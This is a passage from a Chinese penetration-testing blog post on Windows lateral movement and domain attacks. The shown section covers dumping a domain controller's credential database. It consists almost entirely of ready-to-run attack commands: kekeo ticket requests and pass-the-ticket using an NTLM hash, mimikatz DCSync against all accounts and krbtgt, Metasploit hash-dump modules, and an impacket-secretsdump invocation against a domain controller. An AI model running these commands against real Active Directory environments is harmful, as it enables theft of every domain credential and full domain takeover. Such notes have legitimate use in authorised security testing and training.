<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">先导入域控krbtgt的ticket(kekeo)</span><br><span class="line">kekeo &quot;tgt::ask &#x2F;user:dbadmin &#x2F;domain:offensive.local &#x2F;ntlm:4aa0f66b8059750e6e410122cdf05ce2&quot;</span><br><span class="line"> &gt; Ticket in file &#39;TGT_dbadmin@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&#39;</span><br><span class="line"> </span><br><span class="line">kekeo &quot;kerberos::ptt TGT_dbadmin@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&quot;</span><br><span class="line">* File: &#39;TGT_administrator@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&#39;: OK</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">lsadump::dcsync &#x2F;domain:offensive.local &#x2F;all &#x2F;csv</span><br><span class="line">lsadump::dcsync &#x2F;domain:offensive.local &#x2F;user:krbtgt</span><br></pre></td></tr></table></figure>

<ul>
<li>msf</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary&#x2F;admin&#x2F;smb&#x2F;psexec_ntdsgrab</span><br><span class="line"></span><br><span class="line">use windows&#x2F;gather&#x2F;credentials&#x2F;domain_hashdump</span><br></pre></td></tr></table></figure>
<ul>
<li>impacket</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB&#x2F;dc$@10.0.0.1</span><br></pre></td></tr></table></figure>




    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/03/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="prev" title="内网信息收集">
      <i class="fa fa-chevron-left"></i> 内网信息收集
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#windows横向渗透"><span class="nav-number">1.</span> <span class="nav-text">windows横向渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#入口点"><span class="nav-number">1.1.</span> <span class="nav-text">入口点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#提权-amp-降权"><span class="nav-number">1.2.</span> <span class="nav-text">提权&amp;降权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#降权"><span class="nav-number">1.2.1.</span> <span class="nav-text">降权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#提权"><span class="nav-number">1.2.2.</span> <span class="nav-text">提权</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程执行命令方法"><span class="nav-number">1.3.</span> <span class="nav-text">远程执行命令方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#工作组渗透"><span class="nav-number">1.4.</span> <span class="nav-text">工作组渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#密码喷射"><span class="nav-number">1.4.1.</span> <span class="nav-text">密码喷射</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#17-010-08-067等溢出漏洞"><span class="nav-number">1.4.2.</span> <span class="nav-text">17-010,08-067等溢出漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#常规web-服务渗透"><span class="nav-number">1.4.3.</span> <span class="nav-text">常规web,服务渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#常见应用漏洞："><span class="nav-number">1.4.3.1.</span> <span class="nav-text">常见应用漏洞：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#常见语言反序列化漏洞"><span class="nav-number">1.4.3.2.</span> <span class="nav-text">常见语言反序列化漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#数据库漏洞及配置不当"><span class="nav-number">1.4.3.3.</span> <span class="nav-text">数据库漏洞及配置不当</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）"><span class="nav-number">1.4.3.4.</span> <span class="nav-text">web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#系统备份文件（ghost）中读密码"><span class="nav-number">1.4.3.5.</span> <span class="nav-text">系统备份文件（ghost）中读密码</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ntlm-relay"><span class="nav-number">1.4.4.</span> <span class="nav-text">ntlm relay</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#域渗透"><span class="nav-number">1.5.</span> <span class="nav-text">域渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#pth"><span class="nav-number">1.5.1.</span> <span class="nav-text">pth</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ptt"><span class="nav-number">1.5.2.</span> <span class="nav-text">ptt</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#金票"><span class="nav-number">1.5.3.</span> <span class="nav-text">金票</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#银票"><span class="nav-number">1.5.4.</span> <span class="nav-text">银票</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ms14-068"><span class="nav-number">1.5.5.</span> <span class="nav-text">ms14-068</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#GPP漏洞利用"><span class="nav-number">1.5.6.</span> <span class="nav-text">GPP漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#导出域控ntds-dit"><span class="nav-number">1.5.7.</span> <span class="nav-text">导出域控ntds.dit</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ceeeeeeb</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ceeeeeeb</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.1
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
